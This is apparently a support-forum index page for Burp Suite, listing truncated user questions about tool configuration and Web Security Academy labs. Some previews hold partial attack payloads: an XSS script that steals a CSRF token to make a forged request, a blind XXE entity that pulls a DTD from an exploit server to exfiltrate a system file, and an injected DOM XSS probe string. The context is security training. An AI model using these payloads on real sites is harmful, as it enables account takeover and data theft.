How Do I?

Make a new post

  • Depicting OpenID flow using a message sequence chart

    Dear Burp, as part of a research group we are investigating possible ways of visualizing the OpenID communication from a tool we developed. It was suggested for this purpose to use BURP for its proxy capabilities and the fact that it already can identify and filter exactly what we need. We have seen this page here https://portswigger.net/burp/extender#SampleExtensions where you have some examp...

    1 Agent Answer    0 Community Answer
    Jun 07, 2019 11:07AM UTC
  • DOM-based XSS

    Hey, I've got an dynamic analysis from one of request intercepted thru burp proxy: "Data is read from input.value and passed to jQuery. The source element has name form_type. The following value was injected into the source: company The previous value reached the sink as: .jq-change-form[value="pu2smtu1t2%2527%2522`'"/pu2smtu1t2/><pu2smtu1t2/\>v35wawh6yy&...

    1 Agent Answer    0 Community Answer
    Jun 07, 2019 09:36AM UTC
  • Making Burp Trust/Use Custom TLS Certificates

    I'm testing in an environment that has forced TLS decryption (MitM) to allow inspection of HTTPS traffic. In this environment it seems anything I try to do in Burp that involves contacting portswigger.net breaks. My Windows machine trusts the certificate being used for the MitM, but Burp seems to ignore this. Is there any way for me to force Burp to trust a CA or anything like that? Or maybe ...

    1 Agent Answer    0 Community Answer
    Jun 07, 2019 08:25AM UTC
  • Web Secuirty Academy- Exploiting XSS to perform CSRF

    I am having trouble determing where to put the token within the payload given in the solution: <script> var req = new XMLHttpRequest(); req.onload = handleResponse; req.open('get','/email',true); req.send(); function handleResponse() { var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1]; var changeReq = new XMLHtt...

    2 Agent Answers    3 Community Answers
    Jun 06, 2019 10:02PM UTC
  • Choosing Which Agents Perform Scans (Burp Suite Enterprise)

    Hi, I'm wondering if there's a way to specify which agent machine does the actual scanning when specifying a site to scan. We have some sites that are only accessible internally and some that are public facing. I am toying with the idea of having an agent machine within our network and one outside it, but it won't do any good if we can't specify which agent machine does the ...

    1 Agent Answer    0 Community Answer
    Jun 06, 2019 04:30PM UTC
  • Edit scanning configuration

    Hi Burp Support, I noticed that I couldn't edit "Issues Reported" and "Insertion Points Types" in the "Edit scanning configuration" for a single scan. For example, if I select "Select individual issues" in "Issues Reported", then only check "URL parameter values" in "Insertion Point Types", and finally click the "S...

    1 Agent Answer    1 Community Answer
    Jun 05, 2019 09:00AM UTC
  • How do I exclude any issues that are marked as false positive in a consecutive scan?

    We run Active scan regularly against full application. Since in every scan, there is a chance that the same false positives will be reported, we want to eliminate the activity of identifying the repeated false positives in every scan. Is there a way that the first time scan is run, we analyse the report to identify the false positives (FPs) - mark them as FPs and when the subsequent scan is run, ...

    1 Agent Answer    0 Community Answer
    Jun 04, 2019 04:25AM UTC
  • Web Security Academy - Blind XXE Lab 3 ("Exploiting blind XXE to exfiltrate data using a malici...

    Dear Support, I tried the challenge to receive the /etc/hostname using the following: Initial XML in HTTP request: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "https://ac83206f38f287db80cfc1db01360044.web-security-academy.net/exploit"> %xxe; ]> <stockCheck> <productId>6</productId> <...

    1 Agent Answer    1 Community Answer
    Jun 03, 2019 09:19PM UTC
  • Scanning Website with Basic Auth

    I'm not sure if this is related to [1], but I'm trying to scan our dev site with Burp Suite Enterprise. The site is protected with basic auth (login is just a browser prompt). When I tried running a scan after adding the credentials to the Application Login section of the Sites page on the admin console, but it only scanned a single page so it doesn't look like it's actually wo...

    2 Agent Answers    1 Community Answer
    Jun 03, 2019 09:17PM UTC
  • Scanning a site with Platform authentication (Burp suite enterprise Rest API).

    Hi, I can't scan the site with basic authentication on "Burp suite enterprise edition" (RestAPI (from site)). How do I compose curl request with basic authentication tokens? Than You! Kind Regards! Andrii

    1 Agent Answer    0 Community Answer
    Jun 03, 2019 11:44AM UTC